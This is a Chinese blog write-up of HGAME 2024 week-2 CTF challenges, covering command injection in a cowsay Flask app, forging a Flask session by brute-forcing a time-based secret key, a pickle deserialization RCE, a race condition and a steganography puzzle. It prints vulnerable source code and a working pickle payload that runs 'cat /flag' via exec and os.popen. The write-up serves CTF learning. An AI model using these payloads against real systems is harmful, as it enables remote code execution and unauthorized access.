HGAME-2024-WEEK-2

WEB

What the cow say?

这题有点…..

一开始ssti和xss都试过了,都没用

结果看了wp竟然是

image-20240215133813401

给我无语住了,事后我看了一下源代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
from flask import Flask, render_template, request, redirect, url_for
import subprocess

app = Flask(__name__)  

@app.route('/', methods=['GET', 'POST'])
def index():
    result = None 
    if request.method =='POST':
        user_input =request.form['user_input']
        
    result =run_cowsay(user_input)
    return
    
    render_template('index.html',result=result) 
    
@ app.route('/post',methods=['POST'])
def post():
    if request.method == 'POST': 
        user_input =request.form['user_input']
        result =run_cowsay(user_input)
    return

render_template('index.html',result=result)

def run_cowsay(text):
    try: 
        if(waf(text)): 
            cmd_output =subprocess.check_output('cowsay ' +text, text=True,stderr=subprocess.STDOUT, shell=True)
            return cmd_output.strip() 
        else:
            cmd_output =subprocess.check_output('cowsay Waf!',
                            text=True, stderr=subprocess.STDOUT,
                            shell=True)
            return cmd_output.strip()

    except subprocess.CalledProcessError as e:
        return run_cowsay("ERROR!")

def waf(string): 
    blacklist = ['echo','cat', 'tee', ';', '|', '&', '<','>', '\\', 'flag']
    for black in blacklist:
        if (black in string): 
            return False
    return True 
    
if __name__ == '__main__': app.run("0.0.0.0", port=80)


发现了shell=True

myflask

题目给了源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
import pickle
import base64
from flask import Flask, session, request, send_file
from datetime import datetime
from pytz import timezone

currentDateAndTime = datetime.now(timezone('Asia/Shanghai'))
currentTime = currentDateAndTime.strftime("%H%M%S")

app = Flask(__name__)
# Tips: Try to crack this first ↓
app.config['SECRET_KEY'] = currentTime
print(currentTime)

@app.route('/')
def index():
    session['username'] = 'guest'
    return send_file('app.py')

@app.route('/flag', methods=['GET', 'POST'])
def flag():
    if not session:
        return 'There is no session available in your client :('
    if request.method == 'GET':
        return 'You are {} now'.format(session['username'])
    
    # For POST requests from admin
    if session['username'] == 'admin':
        pickle_data=base64.b64decode(request.form.get('pickle_data'))
        # Tips: Here try to trigger RCE
        userdata=pickle.loads(pickle_data)
        return userdata
    else:
        return 'Access Denied'
 
if __name__=='__main__':
    app.run(debug=True, host="0.0.0.0")

可以看到一共有两步,第一步是flask的session伪造,第二步是pickle反序列化执行RCE

首先第一步

1
app.config['SECRET_KEY'] = currentTime

可以看到session的key是通过当前时间来获取的,当前时间也就是你开容器的时间,那么我们可以爆破生成一个key字典

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
def generate_combinations():
    combinations = []
    for i in range(112600, 112800):
        combinations.append(str(i))
    return combinations

def save_to_file(combinations):
    with open("dict.txt", "w") as file:
        for combination in combinations:
            file.write("'"+combination +"'"+ "\n")

if __name__ == "__main__":
    all_combinations = generate_combinations()
    save_to_file(all_combinations)

得到

image-20240208150138874

再去爆破

image-20240208150214330

其中cookie.txt文件中的内容就是cookie请求头中的session值,可以看到爆破出来密码是112716,题目要求我们用admin身份登录,那么就用key进行session伪造admin

image-20240208150349749

得到:eyJ1c2VybmFtZSI6ImFkbWluIn0.ZcRUbg.XOTr5m3BdA23sqIHWd5tSSmW35s

然后就是第二步,进行pickle反序列化rce,我比较菜,反弹不了shell,只能通过debug报错回显pickle执行结果,exp生成的代码如下

1
2
3
4
5
6
7
8
9
10
11
12
13
import pickle
import base64
import os

class Email():
    email = "admin@admin.com"

    def __reduce__(self):
        return (exec,("raise Exception(__import__('os').popen('cat /flag').read())",))


poc = base64.b64encode(pickle.dumps(Email()))
print(poc)

得到:b’gASVVwAAAAAAAACMCGJ1aWx0aW5zlIwEZXhlY5STlIw7cmFpc2UgRXhjZXB0aW9uKF9faW1wb3J0X18oJ29zJykucG9wZW4oJ2NhdCAvZmxhZycpLnJlYWQoKSmUhZRSlC4=’

接下来就直接上burp了

image-20240208150642974

得到flag:hgame{a0fdd637de4a910d01a24a04ac25843cb7d96219}

Select More Courses

第一步先用提示所给的字典用burp爆破出密码,然后直接登录

image-20240211131155114

看到有两个选项,其中要选课就必须先扩展学分

image-20240211131240793

我们用burp不断发点击“申请”的包

image-20240211131354970

image-20240211131416244

点击start attack

然后我们同时去网站上选课

image-20240211131504130

可以看到选课成功

image-20240211131518281

hgame{5ak_p45sW0rD_&_r4Ce_c0nDiT10n}

MISC

ezWord

解压得到“这是一个word文件”,先打开,发现里面有一张png,根据提示改成“这是一个word文件.zip”,解压缩

image-20240212210904382

在这个目录下得到了两张图片和一个zip,以及一个txt文件,根据txt文件的提示,先去用puzzlesolver双图忙水印解开压缩包密码

image-20240212211010324

解压压缩包之后得到一个txt文件

image-20240212211047157

发现是卡尔达诺栅格密码,用https://www.spammimic.com/decode.shtml在线网站去解密

image-20240212211215467

得到

image-20240212211236874

再用rot8000解密

image-20240212211300032

得到hgame{0k_you_s0lve_al1_th3_secr3t}

#WP
HGAME-2024-WEEK-2
http://www.qetx.top/posts/29928/
作者
Qetx.Jul.27
发布于
2024年2月14日
许可协议